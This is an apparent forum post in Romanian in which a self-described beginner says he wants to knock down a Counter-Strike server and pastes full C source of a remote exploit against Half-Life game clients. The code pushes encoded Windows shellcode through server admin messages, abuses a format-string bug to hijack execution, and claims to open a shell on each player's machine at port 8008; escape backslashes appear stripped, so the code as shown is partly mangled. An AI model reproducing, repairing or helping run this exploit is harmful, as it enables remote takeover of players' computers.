|
tHumB
Junior
Inregistrat: acum 18 ani
Postari: 29
|
|
Care ma poate ajuta si pe mine?? ;;).....am gasit un "script"..(nu stiu ce e :D ) si nu stiu cum se foloseste...m-ar interesa foarte foarte tare k vreau sa dau jos un server d cs :D / / / i know i'm a n00b
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
char server_ip[20];
char rcon_pwd[30];
int server_port;
char player_nick[30];
#define STRADDR 0x19d4588
/*
-- portable NT/2k/XP ShellCode features ...
LoadLibraryA IT address 004AC2E0h
GetProcAddress IT address 004AC164h
XOR byte 9Fh
Remote port 8008
Style C
ATTENTION code modified by greuff: 0xff in the first line
changed to 0xfe because the HL-client filters out this
character.
Wrote a short bootstrap loader that changes this byte
again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp,
pop %esi, incb 0xf(%esi))
It additionally corrects the single '%' in the code that
is filtered out by the format-string-function. (offset 0x65)
Works only when the code gets executed by a ret! (buffer-
address has to lie on the stack)
*/
// total length: 1226 bytes
char *shellcode[] = {
"x90x90x90x4cx4cx4cx4cx5exfex46x15xfex46x6b"
"x68x5ex56xc3x90x54x59xfexd1x58x33xc9xb1x1c"
"x90x90x90x90x03xf1x56x5fx33xc9x66xb9x95x04"
"x90x90x90xacx34x9fxaaxe2xfax77x9fx9fx9fx9f",
"xc2x1ex72x46xbexdfx9fx12x2ax6dxbbxdfx9fx12"
"x22x65xbbxdfx9fxf5x98x0fx0fx0fx0fxc6x77x4d"
"x9dx9fx9fx12x2axb5xbaxdfx9fx12x22xacxbaxdf"
"x9fxf5x95x0fx0fx0fx0fxc6x77x24x9dx9fx9fxf5",
"x9fx12x2ax46xbaxdfx9fxc9x12x2ax7axbaxdfx9f"
"xc9x12x2ax76xbaxdfx9fxc9x60x0axacxbaxdfx9f"
"xf5x9fx12x2ax46xbaxdfx9fxc9x12x2ax72xbaxdf"
"x9fxc9x12x2ax6exbaxdfx9fxc9x60x0axacxbaxdf",
"x9fx58x1ax6axbaxdfx9fxdbx9fx9fx9fx12x2ax6a"
"xbaxdfx9fxc9x60x0axa8xbaxdfx9fx12x2axb2xb9"
"xdfx9fx32xcfx60x0axccxbaxdfx9fx12x2axaexb9"
"xdfx9fx32xcfx60x0axccxbaxdfx9fx12x2ax6exba",
"xdfx9fx12x22xb2xb9xdfx9fx3ax12x2ax7axbaxdf"
"x9fx32x12x22xaexb9xdfx9fx34x12x22xaaxb9xdf"
"x9fx34x58x1axbaxb9xdfx9fx9fx9fx9fx9fx58x1a"
"xbexb9xdfx9fx9ex9ex9fx9fx12x2axa6xb9xdfx9f",
"xc9x12x2ax6axbaxdfx9fxc9xf5x9fxf5x9fxf5x8f"
"xf5x9exf5x9fxf5x9fx12x2axd6xb9xdfx9fxc9xf5"
"x9fx60x0axa4xbaxdfx9fxf7x9fxbfx9fx9fx0fxf7"
"x9fx9dx9fx9fx60x0axdcxbaxdfx9fx16x1axcexb9",
"xdfx9fxacx5fxcfxdfxcfxdfxcfx60x0ax65xbbxdf"
"x9fxcfxc4xf5x8fx12x2ax56xbaxdfx9fxc9xccx60"
"x0ax61xbbxdfx9fxf5x9cxccx60x0ax9dxbaxdfx9f"
"x12x2axcaxb9xdfx9fxc9x12x2ax56xbaxdfx9fxc9",
"xccx60x0ax99xbaxdfx9fx12x22xc6xb9xdfx9fx34"
"xacx5fxcfx12x22xfaxb9xdfx9fxc8xcfxcfxcfx12"
"x2ax76xbaxdfx9fx32xcfx60x0axa0xbaxdfx9fxf5"
"xafx60x0axd0xbaxdfx9fx74xd2x0fx0fx0fxacx5f",
"xcfx12x22xfaxb9xdfx9fxc8xcfxcfxcfx12x2ax76"
"xbaxdfx9fx32xcfx60x0axa0xbaxdfx9fxf5xcfx60"
"x0axd0xbaxdfx9fx1cx22xfaxb9xdfx9fx9dx90x1d"
"x88x9ex9fx9fx1ex22xfaxb9xdfx9fx9exbfx9fx9f",
"xedx91x0fx0fx0fx0fx58x1axfaxb9xdfx9fx9fxbf"
"x9fx9fxf5x9fx14x1axfaxb9xdfx9fx12x22xfaxb9"
"xdfx9fxc8xcfx14x1axcexb9xdfx9fxcfx12x2ax76"
"xbaxdfx9fx32xcfx60x0axd8xbaxdfx9fxf5xcfx60",
"x0axd0xbaxdfx9fx14x1axfaxb9xdfx9fxf5x9fxcf"
"x12x2axcexb9xdfx9fx32xcfx12x2axc6xb9xdfx9f"
"x32xcfx60x0ax95xbaxdfx9fxf5x9fx12x22xfaxb9"
"xdfx9fxc8xf5x9fxf5x9fxf5x9fx12x2ax76xbaxdf",
"x9fx32xcfx60x0axa0xbaxdfx9fxf5xcfx60x0axd0"
"xbaxdfx9fxacx56xa6x12xfaxb9xdfx9fx90x18xf8"
"x60x60x60xf5x9fxf7x9fxbfx9fx9fx0fx12x2axce"
"xb9xdfx9fx32xcfx12x2axc6xb9xdfx9fx32xcfx60",
"x0ax91xbaxdfx9fx16x1axfexb9xdfx9fxf5x9fx12"
"x22xfaxb9xdfx9fxc8xcfx12x2axcexb9xdfx9fx32"
"xcfx12x2ax72xbaxdfx9fx32xcfx60x0axd4xbaxdf"
"x9fxf5xcfx60x0axd0xbaxdfx9fxf5x9fx14x1axfe",
"xb9xdfx9fx12x22xfaxb9xdfx9fxc8xcfx14x1axce"
"xb9xdfx9fxcfx12x2ax76xbaxdfx9fx32xcfx60x0a"
"xd8xbaxdfx9fxf5xcfx60x0axd0xbaxdfx9fx76x26"
"x61x60x60x12x2axc6xb9xdfx9fx32xcfx60x0ax8d",
"xbaxdfx9fx12x2axc2xb9xdfx9fx32xcfx60x0ax8d"
"xbaxdfx9fxf5x9fx60x0axc8xbaxdfx9fxcexc9xf7"
"x7fx5dxd5x9fx0fxc5x60x8dxcfxc4xc6xc8xc1xce"
"xc9xccxf7xfbx5exd5x9fx0fxc5x60x8dxcfx33x1b",
"x5fxeax64xc7x34xc6x7dx76x5cxc8xccxd0xdcxd4"
"xacxadx9fxecxf0xfcxf4xfaxebx9fxfdxf6xf1xfb"
"x9fxf3xf6xecxebxfaxf1x9fxfexfcxfcxfaxefxeb"
"x9fxecxfaxf1xfbx9fxedxfaxfcxe9x9fxfcxf3xf0",
"xecxfaxecxf0xfcxf4xfaxebx9fxd4xdaxcdxd1xda"
"xd3xacxadx9fxdcxedxfaxfexebxfaxcfxf6xefxfa"
"x9fxd8xfaxebxccxebxfexedxebxeaxefxd6xf1xf9"
"xf0xdex9fxdcxedxfaxfexebxfaxcfxedxf0xfcxfa",
"xecxecxdex9fxcfxfaxfaxf4xd1xfexf2xfaxfbxcf"
"xf6xefxfax9fxd8xf3xf0xfdxfexf3xdexf3xf3xf0"
"xfcx9fxcdxfaxfexfbxd9xf6xf3xfax9fxc8xedxf6"
"xebxfaxd9xf6xf3xfax9fxccxf3xfaxfaxefx9fxdc",
"xf3xf0xecxfaxd7xfexf1xfbxf3xfax9fxdaxe7xf6"
"xebxcfxedxf0xfcxfaxecxecx9fxdcxf0xfbxfaxfb"
"xbfxfdxe6xbfxe3xc5xfexf1xbfxa3xf6xe5xfexf1"
"xdfxfbxfaxfaxefxe5xf0xf1xfaxb1xf0xedxf8xa1",
"x9dx9fx80xd7x9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx93x9fx9fx9fx9fx9fx9fx9fx9ex9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f",
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f",
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fxdcxd2xdbxb1xdaxc7xdax9fx9fx9fx9fx9f"
"x8fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f"
"x9fx9fx9fx9fx9fx9fx96x96x96x96x96x90x90x90"}; // = 22 blocks
char loader[]=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x4cx4cx4cx4cx5ax31xc9xb1x27x42xe2"
"xfdx52x31xc0x31xc9x66xbbx38x16x88xf9x51x88"
"xd9x40x8ax3cx42x88x3ax42xe2xf8x59xe2xf1xc3";
void create_conn(int *sock, char *host, int port)
{
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);
}
void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
char msg[100000];
struct sockaddr_in sin;
struct sockaddr_in sfrom;
fd_set fdset;
int dummy;
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
perror("sendto"), exit(1);
if(reply)
{
if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
perror("recvfrom"), exit(1);
if(strncmp(msg,"xFFxFFxFFxFF",4))
fprintf(stderr,"protocol error: replyn"), exit(1);
strcpy(reply,msg+4);
}
}
void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
char reply[1000];
char msg[100000];
lowlevel_rcon(sock,host,port,"challenge rcon",reply);
if(!strstr(reply,"challenge rcon "))
fprintf(stderr,"protocol errorn"), exit(1);
reply[strlen(reply)-1]=0;
sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
if(reply_fun)
lowlevel_rcon(sock,host,port,msg,reply);
else
lowlevel_rcon(sock,host,port,msg,NULL);
if(reply_fun)
strcpy(reply_fun,reply);
}
int main(int argc, char **argv)
{
int sock, i,j;
int anzsc;
char reply[1000], command[100];
char evil_message[100000];
unsigned int offset, spaces;
unsigned long addr;
printf("hoagie_adminmod_client - remote exploit for half-life-clientsn");
printf("by nn");
if(argc<4 || argc>5)
{
printf("Usage: %s server_ip server_port rcon_password [player_nick]nn",argv[0]);
exit(1);
}
strcpy(server_ip,argv[1]);
server_port=strtol(argv[2],NULL,10);
strcpy(rcon_pwd,argv[3]);
if(argc==5)
{
strcpy(player_nick,argv[4]);
sprintf(command,"admin_command admin_psay "%s"",player_nick);
}
else
{
player_nick[0]=0;
sprintf(command,"admin_command admin_ssay");
}
if(player_nick[0]==0)
{
printf("Sending to ALL clients! You have 3 sec to abort...n");
sleep(3);
}
create_conn(&sock,server_ip,server_port);
/********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/
offset=5000+112/2;
spaces=0;
for(i=21;i>=0;i--)
{
sprintf(evil_message,"%s ",command);
for(j=0;j<spaces;j++)
strcat(evil_message," ");
sprintf(reply,"%%%du%s",offset,shellcode[i]);
strcat(evil_message,reply);
printf("Writing shellcode fragment at offset %d...n",offset);
send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
offset-=strlen(shellcode[i])+2; // including x0ax00
}
/********* Step 2 - send the shellcode bootstrap loader ***********/
/* correct offset because the shell loader has the double size of a shellcode chunk */
offset-=strlen(shellcode[0]);
sprintf(evil_message,"%s ",command);
for(j=0;j<spaces;j++)
strcat(evil_message," ");
sprintf(reply,"%%%du%s",offset,loader);
strcat(evil_message,reply);
printf("Writing bootstrap at offset %d...n",offset);
send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
/********* Step 3 - construct the code that returns into the shellcode ************/
addr=STRADDR+offset+73+spaces;
sprintf(evil_message,"%s AA%c%c%c%c%c%c%%.f%%.f%%.f%%.f%%.f%%.%du%%n",
command,
0x68,addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,0xc3,734 /* 0x3cd-13 */);
printf("Writing return into shellcode instructions...n");
send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
close(sock);
printf("Shell (hopefully) spawned at client host port 8008.n");
return 0;
}
|
Modificat de tHumB (acum 18 ani)
|
|
